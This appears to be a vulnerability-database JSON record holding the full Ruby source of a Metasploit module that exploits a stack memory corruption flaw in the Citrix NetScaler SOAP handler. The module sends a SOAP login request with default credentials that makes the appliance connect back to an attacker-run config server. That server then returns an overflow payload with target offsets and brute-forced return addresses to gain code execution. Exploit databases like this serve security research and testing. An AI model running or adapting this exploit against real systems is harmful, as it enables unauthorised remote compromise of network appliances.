DATABASE RESOURCES PRICING ABOUT US

{"type": "seebug", "viewCount": 7, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "reporter": "Root", "title": "Citrix NetScaler SOAP Handler Remote Code Execution", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87336", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-11-13T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-87336", "id": "SSV:87336", "status": "cve,poc", "lastseen": "2017-11-19T13:09:54", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::TcpServer\r\n include Msf::Exploit::Brute\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Citrix NetScaler SOAP Handler Remote Code Execution",\r\n 'Description' => %q{\r\n This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.\r\n The vulnerability exists in the SOAP handler, accessible through the web interface. A\r\n malicious SOAP requests can force the handler to connect to a malicious NetScaler config\r\n server. This malicious config server can send a specially crafted response in order to\r\n trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary\r\n code with the privileges of the web server running the SOAP handler. This module has been\r\n tested successfully on the NetScaler Virtual Appliance 450010.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Bradley Austin', # Vulnerability Discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'MinNops' => 512,\r\n 'PrependEncoder' => "\\x81\\xc4\\x54\\xf2\\xff\\xff" # Stack adjustment # add esp, -3500\r\n },\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'bsd',\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'Targets' =>\r\n [\r\n [ 'NetScaler Virtual Appliance 450010',\r\n {\r\n 'RwPtr' => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.\r\n 'Offset' => 606,\r\n 'Ret' => 0xffffda94, # Try before bruteforce...\r\n # The virtual appliance lacks of security mitigations like DEP/ASLR, since the\r\n # process being exploited is an apache child, the bruteforce attack works fine\r\n # here.\r\n 'Bruteforce' =>\r\n {\r\n 'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack\r\n 'Stop' => { 'Ret' => 0xfffdf000 }, # top of the stack\r\n 'Step' => 256\r\n }\r\n }\r\n ],\r\n ],\r\n 'DisclosureDate' => "Sep 22 2014",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to the soap handler', '/soap']),\r\n OptAddress.new('SRVHOST', [true, "The local host to listen on. This must be an address on the local machine reachable by the target", ]),\r\n OptPort.new('SRVPORT', [true, "The local port to listen on.", 3010])\r\n ], self.class)\r\n end\r\n \r\n \r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path)\r\n })\r\n \r\n if res && res.code == 200 && res.body && res.body =~ /Server Request Handler.*No body received/m\r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n if ['0.0.0.0', '127.0.0.1'].include?(datastore['SRVHOST'])\r\n fail_with(Failure::BadConfig, 'Bad SRVHOST, use an address on the local machine reachable by the target')\r\n end\r\n \r\n if check != Exploit::CheckCode::Detected\r\n fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")\r\n end\r\n \r\n start_service\r\n \r\n if target.ret\r\n @curr_ret = target.ret\r\n send_request_soap\r\n Rex.sleep(3)\r\n \r\n if session_created?\r\n return\r\n end\r\n end\r\n \r\n super\r\n end\r\n \r\n def brute_exploit(addrs)\r\n @curr_ret = addrs['Ret']\r\n send_request_soap\r\n end\r\n \r\n def send_request_soap\r\n soap = <<-EOS\r\n<?xml version="1.0" encoding="ISO-8859-1"?><SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">\r\n<SOAP-ENV:Body>\r\n<ns7744:login xmlns:ns7744="urn:NSConfig">\r\n<username xsi:type="xsd:string">nsroot</username>\r\n<password xsi:type="xsd:string">nsroot</password>\r\n<clientip xsi:type="xsd:string">#{datastore['SRVHOST']}</clientip>\r\n<cookieTimeout xsi:type="xsd:int">1800</cookieTimeout>\r\n<ns xsi:type="xsd:string">#{datastore['SRVHOST']}</ns>\r\n</ns7744:login>\r\n</SOAP-ENV:Body>\r\n</SOAP-ENV:Envelope>\r\n EOS\r\n \r\n print_status("#{peer} - Sending soap request...")\r\n \r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'data' => soap\r\n }, 1)\r\n end\r\n \r\n def on_client_data(c)\r\n print_status("#{c.peerhost} - Getting request...")\r\n \r\n data = c.get_once(2)\r\n req_length = data.unpack("v")[0]\r\n \r\n req_data = c.get_once(req_length - 2)\r\n unless req_data.unpack("V")[0] == 0xa5a50000\r\n print_error("#{c.peerhost} - Incorrect request... sending payload anyway")\r\n end\r\n \r\n print_status("#{c.peerhost} - Sending #{payload.encoded.length} bytes payload with ret 0x#{@curr_ret.to_s(16)}...")\r\n \r\n my_payload = Rex::Text.pattern_create(target['Offset'])\r\n my_payload << [@curr_ret, target['RwPtr']].pack("V*")\r\n my_payload << payload.encoded\r\n \r\n pkt = [my_payload.length + 6].pack("v")\r\n pkt << "\\x00\\x00\\xa5\\xa5"\r\n pkt << my_payload\r\n c.put(pkt)\r\n c.disconnect\r\n end\r\n \r\nend\n ", "published": "2014-11-13T00:00:00", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645374815}}

{}